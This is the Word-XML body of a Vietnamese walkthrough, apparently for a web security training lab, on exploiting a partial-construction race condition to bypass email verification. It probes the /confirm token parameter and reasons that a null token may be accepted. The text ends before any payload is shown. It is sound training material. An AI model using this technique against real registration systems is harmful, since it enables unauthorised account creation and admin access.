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BA4E" w14:textId="189D7246" w:rsidR="002F49FE" w:rsidRDefault="00D17B04">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79A38D2A" wp14:editId="5810D3E2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>404038</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="492937"/>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492937"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0428074B" w14:textId="4498864B" w:rsidR="00D17B04" w:rsidRPr="00D17B04" w:rsidRDefault="00D17B04" w:rsidP="00D17B04">
                            <w:pPr>
                              <w:jc w:val="center"/>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17B04">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Partial construction race conditions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A38D2A" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:31.8pt;margin-top:0;width:2in;height:38.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" filled="f" stroked="f">
                <v:fill o:detectmouseclick="t"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0428074B" w14:textId="4498864B" w:rsidR="00D17B04" w:rsidRPr="00D17B04" w:rsidRDefault="00D17B04" w:rsidP="00D17B04">
                      <w:pPr>
                        <w:jc w:val="center"/>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17B04">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Partial construction race conditions</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B35B3DB" w14:textId="22F832B3" w:rsidR="00D17B04" w:rsidRDefault="00D17B04" w:rsidP="00D17B04"/>
    <w:p w14:paraId="26BDB586" w14:textId="56E9ADDF" w:rsidR="00D17B04" w:rsidRDefault="00D17B04" w:rsidP="00D17B04">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC015D5" w14:textId="2D1273B5" w:rsidR="00D17B04" w:rsidRDefault="00D17B04" w:rsidP="00D17B04">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EDACBD" w14:textId="4D15854C" w:rsidR="00D17B04" w:rsidRDefault="0005080A" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài này có chức năng đăng kí tài khoản. Race condtion cho phép bạn vượt qua được xác thực email và đăng kí 1 địa chỉ email bất kỳ mà không phải của bạn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA79770" w14:textId="316993EE" w:rsidR="0005080A" w:rsidRDefault="0005080A" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5CEF0C" w14:textId="73FA8874" w:rsidR="0005080A" w:rsidRDefault="0005080A" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Để giải được bài này, khai thác lỗi race condition để tạo 1 tài khoản sau đó đăng nhập và xóa người dùng carlos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D51ADDE" w14:textId="718814DB" w:rsidR="0005080A" w:rsidRDefault="0005080A" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C951577" w14:textId="4675A1AD" w:rsidR="0005080A" w:rsidRDefault="007531ED" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đầu tiên, chúng ta phải tìm hiểu cơ chế đăng kí tài khoản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C84603" w14:textId="0332A49B" w:rsidR="007531ED" w:rsidRDefault="007531ED" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E174AC" w14:textId="63CA525B" w:rsidR="007531ED" w:rsidRDefault="00C427AA" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78F90D49" wp14:editId="1B42913B">
            <wp:extent cx="5943600" cy="3516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3C669AA" w14:textId="263CAD63" w:rsidR="00C427AA" w:rsidRDefault="000027A9" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nếu chúng ta có được địa chỉ email là @ginandjuice.shop thì có thể truy cập giao diện admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D4782D" w14:textId="7212F537" w:rsidR="000027A9" w:rsidRDefault="000027A9" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5638E3" w14:textId="222A264F" w:rsidR="000027A9" w:rsidRDefault="00F65260" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nhưng trước hết, chúng ta phải đặt địa chỉ email của chúng ta để hiểu cơ chế của nó trước đã.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BED4FC" w14:textId="28FDBCE3" w:rsidR="00F65260" w:rsidRDefault="00F65260" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29441553" w14:textId="004A66B0" w:rsidR="00F65260" w:rsidRDefault="00D47FB2" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Email client: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FB2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@exploit-0ac000ed039ca480829c5a7b010200f6.exploit-server.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4152308D" w14:textId="091D5710" w:rsidR="00D47FB2" w:rsidRDefault="00D47FB2" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45A1A767" w14:textId="6E89F076" w:rsidR="00D47FB2" w:rsidRDefault="0011440C" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nhưng trang web cứ báo lỗi: địa chỉ email không hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDADFF8" w14:textId="33CF05BC" w:rsidR="00E62556" w:rsidRDefault="00E62556" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0690B40F" w14:textId="77777777" w:rsidR="00E62556" w:rsidRPr="00E62556" w:rsidRDefault="00E62556" w:rsidP="00E62556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E62556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bài này chỉ cho phép tạo tài khoản với email @ginandjuice.shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785862D6" w14:textId="77777777" w:rsidR="00E62556" w:rsidRPr="00E62556" w:rsidRDefault="00E62556" w:rsidP="00E62556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281BD291" w14:textId="71D49F34" w:rsidR="00E62556" w:rsidRDefault="00E62556" w:rsidP="00E62556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E62556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khi đăng kí thành viên mới, nó sẽ gửi token đến email. Trong email có đường dẫn xác nhận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C452A" w14:textId="6BC63366" w:rsidR="0011440C" w:rsidRDefault="0011440C" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAEB369" w14:textId="0C223122" w:rsidR="0011440C" w:rsidRDefault="00406E23" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong Burp, từ lịch sử của proxy, để ý thấy có 1 yêu cầu fetch /resources/static/users.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C38B58" w14:textId="38BFDDFD" w:rsidR="00406E23" w:rsidRDefault="00406E23" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71FAF0CE" w14:textId="0AF24360" w:rsidR="00D47FB2" w:rsidRDefault="00621BED" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nó có </w:t>
      </w:r>
      <w:r w:rsidR="00E41DC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thêm chức năng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> kiểm tra email:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4344E5" w14:textId="0B0F767F" w:rsidR="00D47FB2" w:rsidRDefault="00621BED" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72A7E584" wp14:editId="29839A36">
            <wp:extent cx="4902200" cy="375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02200" cy="3759200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B419796" w14:textId="4E615133" w:rsidR="00E41DC6" w:rsidRDefault="00E41DC6" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0674E72D" w14:textId="0E82AE0A" w:rsidR="00E41DC6" w:rsidRDefault="00C93601" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24FCD8F5" wp14:editId="68E0AE11">
            <wp:extent cx="5943600" cy="2414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14:paraId="465B67FC" w14:textId="3BB10AC9" w:rsidR="00C93601" w:rsidRDefault="00C93601" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F78B80" w14:textId="532160B9" w:rsidR="00C93601" w:rsidRDefault="007B78F3" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đọc code Javascript và để ý thấy hàm tạo 1 form cho trang /confirm, có lẽ được liên kết từ email xác nhận. Điều này rò rỉ 1 thực tế là xác nhận cuối cùng sẽ được gửi bằng yêu cầu POST đến /confirm với token được cung cấp trong chuỗi truy vấn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4288846E" w14:textId="0A4D4708" w:rsidR="007B78F3" w:rsidRDefault="007B78F3" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AAB3EE" w14:textId="6D8D24A4" w:rsidR="007B78F3" w:rsidRDefault="007B78F3" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong Repeater, </w:t>
      </w:r>
      <w:r w:rsidR="00652D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hãy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tạo 1 yêu cầu </w:t>
      </w:r>
      <w:r w:rsidR="00652D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tương tự với những gì mà trình duyệt của bạn có thể gửi khi bấm chọn đường dẫn liên kết. Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC39353" w14:textId="1BF7B8C9" w:rsidR="00652D75" w:rsidRDefault="00652D75" w:rsidP="00D17B04">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA985CA" w14:textId="222D0BC3" w:rsidR="00652D75" w:rsidRDefault="00BD2CB2" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56D46C74" wp14:editId="2A953AF2">
            <wp:extent cx="5943600" cy="1181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1181735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528EA44" w14:textId="7DB015E8" w:rsidR="00BD2CB2" w:rsidRDefault="00BD2CB2" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67455200" w14:textId="52250118" w:rsidR="00BD2CB2" w:rsidRDefault="0042642E" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thử nghiệm với tham số token. Quan sát thấy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843FAFC" w14:textId="77777777" w:rsidR="0042642E" w:rsidRDefault="0042642E" w:rsidP="0042642E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0042642E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nếu bạn gửi 1 token bất kỳ, bạn nhận được phản hồi "Incorrect token: token"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A7DBC5" w14:textId="63B4775C" w:rsidR="0042642E" w:rsidRPr="0042642E" w:rsidRDefault="0042642E" w:rsidP="0042642E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0042642E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nếu bạn xóa tham số đi, bạn nhận được phản hồi "Missing parameter: token"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1379B166" w14:textId="6EB89153" w:rsidR="0042642E" w:rsidRPr="0042642E" w:rsidRDefault="0042642E" w:rsidP="0042642E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0042642E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nếu bạn gửi token rỗng, bạn nhận được phản hồi "Forbidden"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC1BB5" w14:textId="1AAFC0A7" w:rsidR="0042642E" w:rsidRDefault="0042642E" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E398E6" w14:textId="2FD4AD1F" w:rsidR="00944D83" w:rsidRDefault="00944D83" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xem xét phản hồi Forbidden, lập trình viên đã vá 1 lỗ hổng có thể được khai thác bằng cách gửi 1 token rỗng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BA2EAF" w14:textId="0D02454C" w:rsidR="00944D83" w:rsidRDefault="00524B41" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="422052D0" wp14:editId="425AC8C3">
            <wp:extent cx="5943600" cy="1200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200785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B292F94" w14:textId="661318BB" w:rsidR="00524B41" w:rsidRDefault="00524B41" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A8A138" w14:textId="5CFAA84C" w:rsidR="00524B41" w:rsidRDefault="00F27ACD" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình đoán có 1 race window giữa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17174BF8" w14:textId="111D77BE" w:rsidR="00F27ACD" w:rsidRPr="00EA4D13" w:rsidRDefault="00F27ACD" w:rsidP="00EA4D13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4D13">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khi bạn gửi 1 yêu cầu để đăng kí người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32877CDB" w14:textId="479C17D1" w:rsidR="00F27ACD" w:rsidRPr="00EA4D13" w:rsidRDefault="00F27ACD" w:rsidP="00EA4D13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4D13">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khi token đăng kí được tạo mới thường lưu trữ trong cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4A7B00" w14:textId="265D932E" w:rsidR="00F27ACD" w:rsidRDefault="00F27ACD" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE41FEE" w14:textId="4CF6E950" w:rsidR="00F27ACD" w:rsidRDefault="00F27ACD" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nếu vậy, có 1 trạng thái trung gian mà null là 1 token hợp lệ để xác nhận đăng kí</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376179F4" w14:textId="62ECAA32" w:rsidR="00F27ACD" w:rsidRDefault="00F27ACD" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4A2B50" w14:textId="0A514FAB" w:rsidR="00EA4D13" w:rsidRDefault="00EA4D13" w:rsidP="00BD2CB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Thử nghiệm với nhiều cách khác nhau bằng cách gửi </w:t>
      </w:r>
      <w:r w:rsidR="00FA542F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tham số token với 1 giá trị tương đương với null. Ví dụ, một số thư viện cho phép bạn truyền 1 mảng rỗng như sau:</w:t>
      </w:r>
    </w:p>
